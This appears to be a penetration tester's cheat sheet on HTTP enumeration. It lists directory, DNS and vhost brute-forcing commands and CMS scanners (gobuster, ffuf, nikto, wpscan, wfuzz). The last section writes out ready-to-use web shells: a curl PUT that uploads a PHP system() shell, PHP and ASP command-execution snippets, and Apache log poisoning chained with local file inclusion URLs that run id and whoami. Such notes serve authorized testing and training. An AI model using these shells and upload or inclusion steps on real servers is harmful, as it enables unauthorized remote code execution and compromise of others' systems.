HTTP Enum

# URL Search

-- Quick Directory Busting:
gobuster dir -u 10.10.10.20 -w /usr/share/seclists/Discovery/Web_Content/common.txt -t 80 -a Linux
gobuster dir -u 10.10.10.20 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 80 -a Linux

-- Comprehensive Directory Busting
gobuster dir -s 200,204,301,302,307,403 -u 10.10.10.10 -w /usr/share/seclists/Discovery/Web_Content/big.txt -t 80 -a 'Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0'

-- Search with File Extension
gobuster dir -u 10.10.10.10 -w /usr/share/seclists/Discovery/Web_Content/common.txt -t 80 -a Linux -x .sh,.html,.txt,.php

==========================================================================================================================================================================================

# DNS Search
gobuster dns -d anysite.com -t 50 -w /wordlists/subdomains.txt

==========================================================================================================================================================================================

# vhost Search
gobuster vhost -u https://anysite.com -w common-vhosts.txt

ffuf -u http://10.10.10.10:80/FUZZ -t 10 -w /usr/share/seclists/Discovery/Web-Content/common.txt -e ".txt,.html,.php,.asp,.aspx,.jsp"
ffuf -u http://10.10.10.10:80/FUZZ -t 10 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -e ".txt,.html,.php,.asp,.aspx,.jsp"

nikto -h 10.10.10.10
nikto -h 10.10.10.10 -p 8080                 # Different port
nikto -h 10.10.10.10 -p 443,80,8080,8081     # Multiple ports
nikto -h 10.10.10.10 -p 80-88                # Port range

wpscan --update
wpscan --url http://10.10.10.10/
wpscan --url http://10.10.10.10/wp/

wpscan -u 10.10.10.10/wp/ --enumerate [p/vp/ap/t/vt/at]

**** User ****
u: enumerate users

**** Plugins Switches ****
p: Popular plugins only
vp: Vulnerable plugins only
ap: All plugins

**** Themes Switches ****
t: Popular themes only
vt: Vulnerable plugins only
at: All themes

droopescan scan drupal -u http://10.10.10.10/ -t 32

joomscan -u http://10.10.10.10/

dirb http://10.10.10.x

******** HOTKEYS *******
n -> Go to the next directory.
q -> Stop scan and save current state.
r -> Remaining scan stats

dirb http://10.10.10.10 /usr/share/wordlists/dirb/big.txt -x /usr/share/wordlists/dirb/extensions_common.txt

-x : use this extension list against the wordlists within big.txt

git clone https://github.com/maurosoria/dirsearch.git
cd dirsearch
python3 dirsearch.py -u <URL> -e <EXTENSION>

Example
python3 dirsearch.py -u  http://10.10.10.10/ -e cgi,py,php,txt,html -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
./dirsearch.py -u  http://10.10.10.10/ -e cgi,py,php,txt,html -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

-u: URL to scan.
-e: formats to search.
-w: wordlist.

nc 10.10.10.10 80
HEAD / HTTP/1.0
GET / HTTP/1.0

# Header
curl -i INSERTIPADDRESS

# Everything else
curl -i -L INSERTIPADDRESS

# Title and all links
curl INSERTIPADDRESS -s -L | grep "title\|href" | sed -e 's/^[[:space:]]*//'

# Just text
curl INSERTIPADDRESS -s -L | html2text -width '99' | uniq

# Upload possible?
curl -v -X OPTIONS http://INSERTIPADDRESS/
curl -v -X PUT -d '<?php system($_GET["cmd"]); ?>' http://INSERTIPADDRESS/test/shell.php

----Simple Test----
wfuzz -w /usr/share/wfuzz/wordlist/general/common.txt http://testsite.com/FUZZ
wfuzz -w /usr/share/wfuzz/wordlist/general/common.txt http://testsite.com/FUZZ.php

----URL testing----
wfuzz -z range,0-10 --hl 97 http://testsite.com/listofproducts.php?cat=FUZZ

----DNS fuzzing----
wfuzz -c -f sub-fighter -w subdomains.txt -u "http://maindomain.com" -H "Host: FUZZ.maindomain.com" -t 42 --hl 1
wfuzz -c -f sub-fighter -w /usr/share/seclists/Discovery/DNS/subdomains-top1mil-20000.txt -u "http://maindomain.com/" -H "Host: FUZZ.maindomain.com" -t 42 --hh 62

In case you can upload a file try the below. This can be used for reverse shell too.

<?php echo system($_GET["cmd"]);?>

OR

<?php echo shell_exec($_GET["cmd"]);?>

davtest -url http://10.10.10.10    <-- Make a test to see file extensions upload.
cadaver http://10.10.10.10/        <-- Connect

<%
Set rs = CreateObject("WScript.Shell")
Set cmd = rs.Exec("cmd /c whoami")
o = cmdStdOut.Readall()
Response.write(o)
%>

nc 10.10.10.10
<?php system($_GET['cmd']); ?>
==========================================================================
After this and on the LFI you have discovered just place the variable cmd:
?cmd=id
&cmd=id 

http://10.10.10.10/somedir/lfi.php?file=../../../var/log/apache2/access.log&cmd=id
http://10.10.10.10/somedir/lfi.php?file=../../../var/log/apache2/access.log&cmd=whoami